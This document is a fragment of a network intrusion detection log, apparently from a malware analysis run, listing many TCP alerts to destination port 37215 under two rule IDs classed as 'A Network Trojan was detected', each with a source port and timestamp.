                  SID:2835222
                  Source Port:34720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.847593
                  SID:2835222
                  Source Port:42928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218292
                  SID:2829579
                  Source Port:58162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408073
                  SID:2829579
                  Source Port:57324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.813463
                  SID:2835222
                  Source Port:43614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208952
                  SID:2829579
                  Source Port:41320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.854499
                  SID:2835222
                  Source Port:47952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.111278
                  SID:2835222
                  Source Port:56190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.604407
                  SID:2835222
                  Source Port:51838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.452655
                  SID:2835222
                  Source Port:43902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175812
                  SID:2835222
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.223907
                  SID:2835222
                  Source Port:36074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609336
                  SID:2835222
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.583277
                  SID:2829579
                  Source Port:45244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.632292
                  SID:2829579
                  Source Port:35178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.164034
                  SID:2835222
                  Source Port:57896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815716
                  SID:2829579
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389862
                  SID:2835222
                  Source Port:40636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479319
                  SID:2835222
                  Source Port:43776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.259774
                  SID:2829579
                  Source Port:35650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.975422
                  SID:2835222
                  Source Port:56326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.409560
                  SID:2835222
                  Source Port:59732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.199768
                  SID:2829579
                  Source Port:56072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129654
                  SID:2829579
                  Source Port:54966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.035788
                  SID:2835222
                  Source Port:52542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425818
                  SID:2829579
                  Source Port:52444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2829579
                  Source Port:52290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.168887
                  SID:2835222
                  Source Port:50534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.586951
                  SID:2835222
                  Source Port:38802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.878894
                  SID:2835222
                  Source Port:44524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993210
                  SID:2835222
                  Source Port:43574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.307932
                  SID:2835222
                  Source Port:43754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.093186
                  SID:2835222
                  Source Port:34198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.717127
                  SID:2835222
                  Source Port:36322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.267667
                  SID:2835222
                  Source Port:51174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.499571
                  SID:2829579
                  Source Port:46804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.020582
                  SID:2835222
                  Source Port:41074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.421240
                  SID:2835222
                  Source Port:55004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2835222
                  Source Port:48606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.136895
                  SID:2829579
                  Source Port:47092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.898943
                  SID:2829579
                  Source Port:36102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532382
                  SID:2835222
                  Source Port:40666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.835620
                  SID:2829579
                  Source Port:40092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875220
                  SID:2829579
                  Source Port:35318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290742
                  SID:2829579
                  Source Port:36744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.637197
                  SID:2835222
                  Source Port:36094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2829579
                  Source Port:40606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330413
                  SID:2835222
                  Source Port:60640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.977576
                  SID:2835222
                  Source Port:35898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923936
                  SID:2829579
                  Source Port:54416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424272
                  SID:2829579
                  Source Port:33554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.177272
                  SID:2829579
                  Source Port:48536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.596894
                  SID:2829579
                  Source Port:52570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.444062
                  SID:2829579
                  Source Port:40708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.621614
                  SID:2835222
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356986
                  SID:2835222
                  Source Port:41980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.517379
                  SID:2829579
                  Source Port:34576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.851265
                  SID:2829579
                  Source Port:35896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.852071
                  SID:2829579
                  Source Port:40334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.924375
                  SID:2835222
                  Source Port:56032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.595599
                  SID:2829579
                  Source Port:34648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046774
                  SID:2829579
                  Source Port:43336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.638682
                  SID:2829579
                  Source Port:59646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.898056
                  SID:2829579
                  Source Port:37398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.179431
                  SID:2835222
                  Source Port:57914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.540139
                  SID:2829579
                  Source Port:38738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.909610
                  SID:2835222
                  Source Port:41040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992323
                  SID:2829579
                  Source Port:53520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.838823
                  SID:2829579
                  Source Port:43782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003273
                  SID:2829579
                  Source Port:46204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243184
                  SID:2835222
                  Source Port:55446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.148356
                  SID:2829579
                  Source Port:39234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514525
                  SID:2829579
                  Source Port:37850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444942
                  SID:2835222
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.088418
                  SID:2829579
                  Source Port:46372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.831803
                  SID:2835222
                  Source Port:46318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.526771
                  SID:2829579
                  Source Port:51840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.834726
                  SID:2835222
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.524057
                  SID:2829579
                  Source Port:38746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.965572
                  SID:2835222
                  Source Port:54350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.645835
                  SID:2829579
                  Source Port:33110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.859169
                  SID:2835222
                  Source Port:38632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.311448
                  SID:2835222
                  Source Port:44040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.754938
                  SID:2829579
                  Source Port:36232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2835222
                  Source Port:36284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.530993
                  SID:2829579
                  Source Port:36854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669251
                  SID:2829579
                  Source Port:57864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.351046
                  SID:2835222
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468333
                  SID:2829579
                  Source Port:51526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.394343
                  SID:2835222
                  Source Port:45672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623993
                  SID:2835222
                  Source Port:45736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.749504
                  SID:2835222
                  Source Port:33982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595154
                  SID:2835222
                  Source Port:42234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.753390
                  SID:2829579
                  Source Port:46028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755062
                  SID:2835222
                  Source Port:42948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.655594
                  SID:2829579
                  Source Port:41886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962924
                  SID:2829579
                  Source Port:41612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.731752
                  SID:2829579
                  Source Port:59418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.166033
                  SID:2829579
                  Source Port:49812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921698
                  SID:2835222
                  Source Port:33336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.602684
                  SID:2829579
                  Source Port:48840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985510
                  SID:2829579
                  Source Port:52880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.497518
                  SID:2829579
                  Source Port:38120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2829579
                  Source Port:44104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.114397
                  SID:2835222
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821863
                  SID:2829579
                  Source Port:53576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2829579
                  Source Port:56094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.314793
                  SID:2829579
                  Source Port:56248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.919508
                  SID:2829579
                  Source Port:60632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2829579
                  Source Port:44146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2835222
                  Source Port:33670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.680927
                  SID:2835222
                  Source Port:46254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.168344
                  SID:2835222
                  Source Port:52418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.530292
                  SID:2829579
                  Source Port:57342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.792602
                  SID:2835222
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.832820
                  SID:2835222
                  Source Port:39364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.076787
                  SID:2835222
                  Source Port:59584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.414993
                  SID:2829579
                  Source Port:46632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.076787
                  SID:2835222
                  Source Port:48686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.103998
                  SID:2835222
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.164595
                  SID:2835222
                  Source Port:46580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.158700
                  SID:2835222
                  Source Port:48486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2835222
                  Source Port:38902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.529437
                  SID:2835222
                  Source Port:58656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.964630
                  SID:2835222
                  Source Port:34226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.522844
                  SID:2829579
                  Source Port:40108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522972
                  SID:2829579
                  Source Port:42084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.619989
                  SID:2829579
                  Source Port:43768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634541
                  SID:2835222
                  Source Port:35238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361333
                  SID:2835222
                  Source Port:55804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589238
                  SID:2835222
                  Source Port:46268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249183
                  SID:2829579
                  Source Port:56884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.440682
                  SID:2835222
                  Source Port:54938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632030
                  SID:2829579
                  Source Port:44838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.811617
                  SID:2835222
                  Source Port:50600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.973099
                  SID:2835222
                  Source Port:44222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.270061
                  SID:2835222
                  Source Port:53844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.542013
                  SID:2835222
                  Source Port:37558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.889378
                  SID:2835222
                  Source Port:57384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.737696
                  SID:2835222
                  Source Port:37244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853498
                  SID:2829579
                  Source Port:35884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825579
                  SID:2835222
                  Source Port:45458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810529
                  SID:2829579
                  Source Port:53554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.073080
                  SID:2829579
                  Source Port:48116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.077497
                  SID:2829579
                  Source Port:35552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.366871
                  SID:2829579
                  Source Port:36216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.879790
                  SID:2829579
                  Source Port:47286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.775656
                  SID:2835222
                  Source Port:33908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.660199
                  SID:2835222
                  Source Port:34810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.906291
                  SID:2835222
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.587142
                  SID:2829579
                  Source Port:60502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.390011
                  SID:2829579
                  Source Port:33306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.121887
                  SID:2829579
                  Source Port:59398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.981369
                  SID:2829579
                  Source Port:36192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400530
                  SID:2835222
                  Source Port:35876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.545396
                  SID:2835222
                  Source Port:55254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.391743
                  SID:2835222
                  Source Port:41048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.424443
                  SID:2835222
                  Source Port:46468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2835222
                  Source Port:48594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.138788
                  SID:2835222
                  Source Port:44652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.127058
                  SID:2829579
                  Source Port:44780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699578
                  SID:2835222
                  Source Port:44808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444942
                  SID:2829579
                  Source Port:36448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.983854
                  SID:2835222
                  Source Port:52146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583934
                  SID:2835222
                  Source Port:44324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.813463
                  SID:2829579
                  Source Port:48368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.237308
                  SID:2829579
                  Source Port:59614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2829579
                  Source Port:60292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134235
                  SID:2829579
                  Source Port:41766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.742561
                  SID:2835222
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376838
                  SID:2835222
                  Source Port:48774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.042131
                  SID:2829579
                  Source Port:56728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.386874
                  SID:2829579
                  Source Port:45646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.678102
                  SID:2829579
                  Source Port:38410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752135
                  SID:2829579
                  Source Port:55794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.466175
                  SID:2829579
                  Source Port:54584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.755859
                  SID:2835222
                  Source Port:36002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755874
                  SID:2829579
                  Source Port:49408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164173
                  SID:2835222
                  Source Port:34656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.544699
                  SID:2835222
                  Source Port:48766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404259
                  SID:2829579
                  Source Port:40128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.991473
                  SID:2829579
                  Source Port:33370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522450
                  SID:2835222
                  Source Port:53288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
